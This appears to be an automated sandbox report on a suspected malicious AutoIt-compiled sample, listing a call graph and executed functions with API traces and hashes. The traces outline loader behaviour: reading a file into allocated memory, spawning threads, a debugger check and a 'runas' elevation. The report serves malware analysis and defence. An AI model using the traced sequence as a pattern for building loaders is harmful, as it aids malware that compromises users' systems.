111343 404b2b GetSystemInfo 111341->111343 111355 404b37 111342->111355 111344 404af8 111343->111344 111344->111323 111345->111339 111345->111340 111348 404ad4 111351 404b37 2 API calls 111348->111351 111349 404b1f GetSystemInfo 111350 404ae9 111349->111350 111350->111344 111353 404aef FreeLibrary 111350->111353 111352 404adc GetNativeSystemInfo 111351->111352 111352->111350 111353->111344 111356 404ad0 111355->111356 111357 404b40 LoadLibraryA 111355->111357 111356->111348 111356->111349 111357->111356 111358 404b51 GetProcAddress 111357->111358 111358->111356 111359 d6f600 111373 d6d250 111359->111373 111361 d6f6fc 111376 d6f4f0 111361->111376 111379 d70730 GetPEB 111373->111379 111375 d6d8db 111375->111361 111377 d6f4f9 Sleep 111376->111377 111378 d6f507 111377->111378 111380 d7075a 111379->111380 111380->111375 111381 ac5a3b 111382 ac5a45 111381->111382 111387 ac4f7c 111381->111387 111383 ac51ae 111382->111383 111384 ac5a4b CreateThread 111382->111384 111385 ac5a59 RtlExitUserThread 111384->111385 111391 ac5b1d 111385->111391 111386 ac4f88 111387->111386 111388 ac5d20 2 API calls 111387->111388 111390 ac4f99 111388->111390 111392 ac5d20 2 API calls 111391->111392 111393 ac5b3c 111392->111393 111393->111393 111394 401078 111399 40708b 111394->111399 111396 40108c 111397 422d40 __cinit 67 API calls 111396->111397 111398 401096 111397->111398 111400 40709b __ftell_nolock 111399->111400 111401 407667 59 API calls 111400->111401 111402 407151 111401->111402 111403 404706 61 API calls 111402->111403 111404 40715a 111403->111404 111430 42050b 111404->111430 111407 407cab 59 API calls 111408 407173 111407->111408 111409 403f74 59 API calls 111408->111409 111410 407182 111409->111410 111411 407667 59 API calls 111410->111411 111412 40718b 111411->111412 111413 407d8c 59 API calls 111412->111413 111414 407194 RegOpenKeyExW 111413->111414 111415 43e8b1 RegQueryValueExW 111414->111415 111416 4071b6 Mailbox 111414->111416 111417 43e943 RegCloseKey 111415->111417 111418 43e8ce 111415->111418 111416->111396 111417->111416 111429 43e955 _wcscat Mailbox __wsetenvp 111417->111429 111419 420db6 Mailbox 59 API calls 111418->111419 111420 43e8e7 111419->111420 111421 40522e 59 API calls 111420->111421 111422 43e8f2 RegQueryValueExW 111421->111422 111424 43e90f 111422->111424 111426 43e929 111422->111426 111423 4079f2 59 API calls 111423->111429 111425 407bcc 59 API calls 111424->111425 111425->111426 111426->111417 111427 407de1 59 API calls 111427->111429 111428 403f74 59 API calls 111428->111429 111429->111416 111429->111423 111429->111427 111429->111428 111431 431940 __ftell_nolock 111430->111431 111432 420518 GetFullPathNameW 111431->111432 111433 42053a 111432->111433 111434 407bcc 59 API calls 111433->111434 111435 407165 111434->111435 111435->111407 111436 acaaf0 111437 acab06 111436->111437 111441 acab57 111437->111441 111442 ac6490 111437->111442 111444 ac5f10 111442->111444 111445 ac5d90 111442->111445 111443 ac6084 SetFilePointerEx 111443->111444 111444->111443 111444->111445 111446 affaf0 111445->111446 111447 affafd 111446->111447 111449 affb84 111446->111449 111448 affb2a 111447->111448 111447->111449 111451 b0032f 111448->111451 111465 b01a1b 21 API calls 2 library calls 111448->111465 111450 affc05 111449->111450 111457 affbda 111449->111457 111452 affc38 111450->111452 111464 b00fe0 21 API calls __startOneArgErrorHandling 111450->111464 111451->111441 111452->111441 111454 b008d6 111454->111441 111456 affc22 111456->111441 111457->111452 111458 b01167 111457->111458 111459 b0116e 111457->111459 111466 b00ff7 21 API calls __startOneArgErrorHandling 111458->111466 111467 b00fe0 21 API calls __startOneArgErrorHandling 111459->111467 111462 b0116c 111462->111441 111463 b01173 111463->111441 111464->111456 111465->111454 111466->111462 111467->111463 111468 d6fbab 111469 d6fbb0 111468->111469 111470 d6d250 GetPEB 111469->111470 111471 d6fbbc 111470->111471 111472 d6fc70 111471->111472 111473 d6fbda 111471->111473 111490 d70520 9 API calls 111472->111490 111477 d6f880 111473->111477 111476 d6fc57 111478 d6d250 GetPEB 111477->111478 111479 d6f91f 111478->111479 111482 d6f979 VirtualAlloc 111479->111482 111484 d6f95d 111479->111484 111488 d6fa80 CloseHandle 111479->111488 111489 d6fa90 VirtualFree 111479->111489 111491 d70790 GetPEB 111479->111491 111481 d6f950 CreateFileW 111481->111479 111481->111484 111483 d6f99a ReadFile 111482->111483 111482->111484 111483->111484 111487 d6f9b8 VirtualAlloc 111483->111487 111485 d6fb6c VirtualFree 111484->111485 111486 d6fb7a 111484->111486 111485->111486 111486->111476 111487->111479 111487->111484 111488->111479 111489->111479 111490->111476 111492 d707ba 111491->111492 111492->111481 111493 43fdfc 111498 40ab30 Mailbox _memmove 111493->111498 111495 45617e Mailbox 59 API calls 111519 40a057 111495->111519 111497 420db6 59 API calls Mailbox 111497->111498 111498->111497 111500 40b525 111498->111500 111498->111519 111520 407de1 59 API calls 111498->111520 111523 409f37 Mailbox 111498->111523 111524 47bc6b 341 API calls 111498->111524 111527 40b2b6 111498->111527 111529 409ea0 341 API calls 111498->111529 111530 44086a 111498->111530 111532 440878 111498->111532 111534 44085c 111498->111534 111535 40b21c 111498->111535 111538 456e8f 59 API calls 111498->111538 111544 47445a 341 API calls 111498->111544 111545 47df23 111498->111545 111548 468715 111498->111548 111552 482141 111498->111552 111590 47e4d1 111498->111590 111596 47c2e0 111498->111596 111628 467956 111498->111628 111634 45617e 111498->111634 111639 409c90 59 API calls Mailbox 111498->111639 111643 47c193 85 API calls 2 library calls 111498->111643 111645 469e4a 89 API calls 4 library calls 111500->111645 111502 420db6 59 API calls Mailbox 111502->111523 111503 40b47a 111504 4409e5 111503->111504 111505 440055 111503->111505 111650 469e4a 89 API calls 4 library calls 111504->111650 111644 469e4a 89 API calls 4 library calls 111505->111644 111507 40b475 111513 408047 59 API calls 111507->111513 111510 440064 111513->111519 111514 407667 59 API calls 111514->111523 111516 408047 59 API calls 111516->111523 111517 456e8f 59 API calls 111517->111523 111518 422d40 67 API calls __cinit 111518->111523 111520->111498 111521 4409d6 111649 469e4a 89 API calls 4 library calls 111521->111649 111523->111502 111523->111503 111523->111505 111523->111507 111523->111514 111523->111516 111523->111517 111523->111518 111523->111519 111523->111521 111525 40a55a 111523->111525 111637 40c8c0 341 API calls 2 library calls 111523->111637 111638 40b900 60 API calls Mailbox 111523->111638 111524->111498 111648 469e4a 89 API calls 4 library calls 111525->111648 111642 40f6a3 341 API calls 111527->111642 111529->111498 111646 409c90 59 API calls Mailbox 111530->111646 111647 469e4a 89 API calls 4 library calls 111532->111647 111534->111495 111534->111519 111640 409d3c 60 API calls Mailbox 111535->111640 111537 40b22d 111641 409d3c 60 API calls Mailbox 111537->111641 111538->111498 111544->111498 111546 47cadd 130 API calls 111545->111546 111547 47df33 111546->111547 111547->111498 111549 468723 111548->111549 111550 46871e 111548->111550 111549->111498 111651 4677b3 111550->111651 111553 407667 59 API calls 111552->111553 111554 482158 111553->111554 111555 409837 84 API calls 111554->111555 111556 482167 111555->111556 111557 407a16 59 API calls 111556->111557 111558 48217a 111557->111558 111559 409837 84 API calls 111558->111559 111560 482187 111559->111560 111561 4821a1 111560->111561 111562 482215 111560->111562 111674 409b3c 59 API calls 111561->111674 111564 409837 84 API calls 111562->111564 111566 48221a 111564->111566 111565 4821a6 111567 482204 111565->111567 111571 4821bd 111565->111571 111568 482228 111566->111568 111569 482246 111566->111569 111675 409a98 59 API calls Mailbox 111567->111675 111676 409a98 59 API calls Mailbox 111568->111676 111573 48225b 111569->111573 111677 409b3c 59 API calls 111569->111677 111576 40784b 59 API calls 111571->111576 111574 482270 111573->111574 111678 409b3c 59 API calls 111573->111678 111679 407f77 59 API calls 2 library calls 111574->111679 111575 482211 Mailbox 111575->111498 111580 4821ca 111576->111580 111582 407b2e 59 API calls 111580->111582 111581 48228a 111680 45f401 62 API calls Mailbox 111581->111680 111584 4821d8 111582->111584 111585 40784b 59 API calls 111584->111585 111586 4821f1 111585->111586 111588 407b2e 59 API calls 111586->111588 111587 4821ff 111681 409a3c 59 API calls Mailbox 111587->111681 111588->111587 111593 47e4e4 111590->111593 111591 409837 84 API calls 111592 47e521 111591->111592 111682 467729 111592->111682 111593->111591 111595 47e4f3 111593->111595 111595->111498 111597 407667 59 API calls 111596->111597 111598 47c2f4 111597->111598 111599 407667 59 API calls 111598->111599 111600 47c2fc 111599->111600 111601 407667 59 API calls 111600->111601 111602 47c304 111601->111602 111603 409837 84 API calls 111602->111603 111627 47c312 111603->111627 111604 407924 59 API calls 111604->111627 111605 407bcc 59 API calls 111605->111627 111606 47c4fb 111612 47c528 Mailbox 111606->111612 111725 409a3c 59 API calls Mailbox 111606->111725 111608 47c4e2 111611 407cab 59 API calls 111608->111611 111609 47c4fd 111614 407cab 59 API calls 111609->111614 111610 408047 59 API calls 111610->111627 111613 47c4ef 111611->111613 111612->111498 111617 407b2e 59 API calls 111613->111617 111615 47c50c 111614->111615 111618 407b2e 59 API calls 111615->111618 111616 407e4f 59 API calls 111620 47c3a9 CharUpperBuffW 111616->111620 111617->111606 111618->111606 111619 407e4f 59 API calls 111621 47c469 CharUpperBuffW 111619->111621 111723 40843a 68 API calls 111620->111723 111724 40c5a7 69 API calls 2 library calls 111621->111724 111624 409837 84 API calls 111624->111627 111625 407cab 59 API calls 111625->111627 111626 407b2e 59 API calls 111626->111627 111627->111604 111627->111605 111627->111606 111627->111608 111627->111609 111627->111610 111627->111612 111627->111616 111627->111619 111627->111624 111627->111625 111627->111626 111629 467962 111628->111629 111630 420db6 Mailbox 59 API calls 111629->111630 111631 467970 111630->111631 111632 46797e 111631->111632 111633 407667 59 API calls 111631->111633 111632->111498 111633->111632 111726 4560c0 111634->111726 111636 45618c 111636->111498 111637->111523 111638->111523 111639->111498 111640->111537 111641->111527 111642->111500 111643->111498 111644->111510 111645->111534 111646->111534 111647->111534 111648->111519 111649->111504 111650->111519 111652 4677ca 111651->111652 111667 4678ea 111651->111667 111653 4677e2 111652->111653 111654 46780a 111652->111654 111656 467821 111652->111656 111653->111654 111657 4677f2 111653->111657 111655 420db6 Mailbox 59 API calls 111654->111655 111661 467800 Mailbox _memmove 111655->111661 111658 420db6 Mailbox 59 API calls 111656->111658 111670 46783e 111656->111670 111665 420db6 Mailbox 59 API calls 111657->111665 111658->111670 111659 467877 111663 420db6 Mailbox 59 API calls 111659->111663 111660 467869 111662 420db6 Mailbox 59 API calls 111660->111662 111664 420db6 Mailbox 59 API calls 111661->111664 111662->111661 111666 46787d 111663->111666 111664->111667 111665->111661 111672 46746b 59 API calls Mailbox 111666->111672 111667->111549 111669 467889 111673 405a15 61 API calls Mailbox 111669->111673 111670->111659 111670->111660 111670->111661 111672->111669 111673->111661 111674->111565 111675->111575 111676->111575 111677->111573 111678->111574 111679->111581 111680->111587 111681->111575 111683 467736 111682->111683 111684 420db6 Mailbox 59 API calls 111683->111684 111685 46773d 111684->111685 111688 465b7a 111685->111688 111687 467780 Mailbox 111687->111595 111689 407e4f 59 API calls 111688->111689 111690 465b8d CharLowerBuffW 111689->111690 111692 465ba0 111690->111692 111691 4079f2 59 API calls 111691->111692 111692->111691 111693 465baa _memset Mailbox 111692->111693 111695 465bda 111692->111695 111693->111687 111694 465bec 111697 420db6 Mailbox 59 API calls 111694->111697 111695->111694 111696 4079f2 59 API calls 111695->111696 111696->111694 111700 465c1a 111697->111700 111702 465c39 111700->111702 111721 465ab6 59 API calls 111700->111721 111701 465c78 111701->111693 111703 420db6 Mailbox 59 API calls 111701->111703 111706 465cd7 111702->111706 111704 465c92 111703->111704 111705 420db6 Mailbox 59 API calls 111704->111705 111705->111693 111707 407667 59 API calls 111706->111707 111708 465d09 111707->111708 111709 407667 59 API calls 111708->111709 111710 465d12 111709->111710 111711 407667 59 API calls 111710->111711 111718 465d1b _wcscmp 111711->111718 111712 407bcc 59 API calls 111712->111718 111713 423606 GetStringTypeW 111713->111718 111714 407924 59 API calls 111714->111718 111716 42358a 59 API calls 111716->111718 111717 465cd7 60 API calls 111717->111718 111718->111712 111718->111713 111718->111714 111718->111716 111718->111717 111719 465ff0 Mailbox 111718->111719 111720 408047 59 API calls 111718->111720 111722 42362c GetStringTypeW _iswctype 111718->111722 111719->111701 111720->111718 111721->111700 111722->111718 111723->111627 111724->111627 111725->111612 111727 4560e8 111726->111727 111728 4560cb 111726->111728 111727->111636 111728->111727 111730 4560ab 59 API calls Mailbox 111728->111730 111730->111728

                                                                                        Executed Functions

                                                                                        Function 00AECBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d$w
                                                                                        • API String ID: 0-2400632791
                                                                                        • Opcode ID: c8bba2e69ec25531c3dc7a931015b6887904fe1b36055717e2fc713ccce9aab6
                                                                                        • Instruction ID: 608a7f673b0f79dc2a4d1cbffbee4955f98bf535f1149b945969a973192e74ac
                                                                                        • Opcode Fuzzy Hash: c8bba2e69ec25531c3dc7a931015b6887904fe1b36055717e2fc713ccce9aab6
                                                                                        • Instruction Fuzzy Hash: C0C1473195C3C0AECA35672B4C1DB7B3A746B61B30F4C0A96F5569A0F3E7249C079632
                                                                                        Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                          • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                                                          • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                          • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                          • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                                                          • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                          • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                          • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                          • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                                                          • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                          • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                          • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                          • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                          • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                                                          • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                        • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                                                        • API String ID: 529118366-2806069697
                                                                                        • Opcode ID: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                                        • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                                                        • Opcode Fuzzy Hash: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                                        • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D
                                                                                        Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2085 4049a0-404a00 call 407667 GetVersionExW call 407bcc 2090 404a06 2085->2090 2091 404b0b-404b0d 2085->2091 2092 404a09-404a0e 2090->2092 2093 43d767-43d773 2091->2093 2095 404b12-404b13 2092->2095 2096 404a14 2092->2096 2094 43d774-43d778 2093->2094 2097 43d77b-43d787 2094->2097 2098 43d77a 2094->2098 2099 404a15-404a4c call 407d2c call 407726 2095->2099 2096->2099 2097->2094 2100 43d789-43d78e 2097->2100 2098->2097 2108 404a52-404a53 2099->2108 2109 43d864-43d867 2099->2109 2100->2092 2102 43d794-43d79b 2100->2102 2102->2093 2104 43d79d 2102->2104 2107 43d7a2-43d7a5 2104->2107 2110 404a93-404aaa GetCurrentProcess IsWow64Process 2107->2110 2111 43d7ab-43d7c9 2107->2111 2108->2107 2112 404a59-404a64 2108->2112 2113 43d880-43d884 2109->2113 2114 43d869 2109->2114 2115 404aac 2110->2115 2116 404aaf-404ac0 2110->2116 2111->2110 2117 43d7cf-43d7d5 2111->2117 2118 43d7ea-43d7f0 2112->2118 2119 404a6a-404a6c 2112->2119 2121 43d886-43d88f 2113->2121 2122 43d86f-43d878 2113->2122 2120 43d86c 2114->2120 2115->2116 2124 404ac2-404ad2 call 404b37 2116->2124 2125 404b2b-404b35 GetSystemInfo 2116->2125 2126 43d7d7-43d7da 2117->2126 2127 43d7df-43d7e5 2117->2127 2130 43d7f2-43d7f5 2118->2130 2131 43d7fa-43d800 2118->2131 2128 404a72-404a75 2119->2128 2129 43d805-43d811 2119->2129 2120->2122 2121->2120 2123 43d891-43d894 2121->2123 2122->2113 2123->2122 2142 404ad4-404ae1 call 404b37 2124->2142 2143 404b1f-404b29 GetSystemInfo 2124->2143 2132 404af8-404b08 2125->2132 2126->2110 2127->2110 2136 43d831-43d834 2128->2136 2137 404a7b-404a8a 2128->2137 2133 43d813-43d816 2129->2133 2134 43d81b-43d821 2129->2134 2130->2110 2131->2110 2133->2110 2134->2110 2136->2110 2139 43d83a-43d84f 2136->2139 2140 404a90 2137->2140 2141 43d826-43d82c 2137->2141 2144 43d851-43d854 2139->2144 2145 43d859-43d85f 2139->2145 2140->2110 2141->2110 2150 404ae3-404ae7 GetNativeSystemInfo 2142->2150 2151 404b18-404b1d 2142->2151 2146 404ae9-404aed 2143->2146 2144->2110 2145->2110 2146->2132 2149 404aef-404af2 FreeLibrary 2146->2149 2149->2132 2150->2146 2151->2150
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1986165174-0
                                                                                        • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                        • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                                                        • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                        • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E
                                                                                        Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2152 404e89-404ea1 CreateStreamOnHGlobal 2153 404ec1-404ec6 2152->2153 2154 404ea3-404eba FindResourceExW 2152->2154 2155 43d933-43d942 LoadResource 2154->2155 2156 404ec0 2154->2156 2155->2156 2157 43d948-43d956 SizeofResource 2155->2157 2156->2153 2157->2156 2158 43d95c-43d967 LockResource 2157->2158 2158->2156 2159 43d96d-43d98b 2158->2159 2159->2156
                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                                                        • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                        • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                                                        • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                        • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                                                                        Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: pbL$%I
                                                                                        • API String ID: 3964851224-1578263234
                                                                                        • Opcode ID: 7152a0fd736f42cd8f2ab3e45c1d2167de7eabf0c22f3f90728c385b0a10e59f
                                                                                        • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                                                        • Opcode Fuzzy Hash: 7152a0fd736f42cd8f2ab3e45c1d2167de7eabf0c22f3f90728c385b0a10e59f
                                                                                        • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                                                        Function 0040E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                                                        • API String ID: 0-2838938394
                                                                                        • Opcode ID: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                                        • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
